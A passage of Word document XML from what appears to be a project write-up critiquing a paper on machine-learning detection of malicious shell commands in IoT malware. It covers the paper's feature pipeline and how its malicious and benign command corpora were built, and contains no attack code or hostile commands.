              <w:t>Sparse occurrence-count vector over the corpus vocabulary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Token frequency is the signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n-gram proximity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Contiguous n-token sequences (n ≤ 5) appended to the bag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Command </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, not merely content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Projection retaining </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>99.9%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> of training-set variance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Purely computational — dimensionality reduction, no security semantics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Classifiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.2, 4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Logistic Regression, Random Forest, and a DNN whose five hidden layers were reached by tuning; K = 10 cross-validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Element 2 deserves emphasis because it is the paper's genuine contribution and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the part this project inherits. The authors do not present the character model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">as an alternative encoding; they present it as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>repair</w:t>
      </w:r>
      <w:r>
        <w:t>. Their own words</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>are that discarding sub-three-character words "presents a major shortcoming,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>since a large number of command keywords have a length of fewer than three</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">characters, including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t>, or consist of special characters, such as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>." A tokenizer built for English prose deletes precisely the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>tokens that carry shell semantics. That observation — that the informative part</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of a command is its operators and its short built-ins, not its long words — is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the finding this project's structural feature family is built on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The corpus, and why its construction matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The malicious class comes from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2,891 IoT malware binaries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> drawn from the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>IoTPOT honeypot project, spread across eight instruction-set architectures with</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ARM (23.11%) and MIPS (20.75%) dominant — the signature of embedded botnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">malware. The commands are recovered </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>statically</w:t>
      </w:r>
      <w:r>
        <w:t>: each binary is disassembled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">with Radare2, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is run over the disassembly, 18 samples are examined by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hand to establish patterns, and those patterns — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1,273 of them</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — are applied</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>mechanically to the remaining 2,873 samples, yielding **178,261 malicious</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>commands**.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The benign class is assembled from three sources, and its composition is the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>single most consequential fact in the paper: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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Median length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Std</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PCAP Network 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1,625,143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>185</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.88</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PCAP Network 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4,735</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>167</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>146.26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bash history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9 volunteers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5,772</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>27.71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>(Malware)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2,891</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>178,261</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>384</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>168.03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>**99.65% of the benign class is unencrypted network traffic, not shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>commands.** Only 5,772 rows — 0.35% — are commands a human being actually typed,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>collected from nine volunteers' shell histories (~143 MB, hand-anonymised).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Network 1 alone contributes 1.6 million rows harvested from 28,578,754 captured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>payloads, of which only the unencrypted 1,625,143 were usable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Two properties of that table are worth stating explicitly because they are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>visible in the authors' own numbers rather than inferred. First, the dominant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>benign source has a **standard deviation of 4.88 characters across 1.6 million</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rows**, with mean 184.68 and median 185. A distribution that tight over a corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that large is not a population of distinct commands; it is one HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
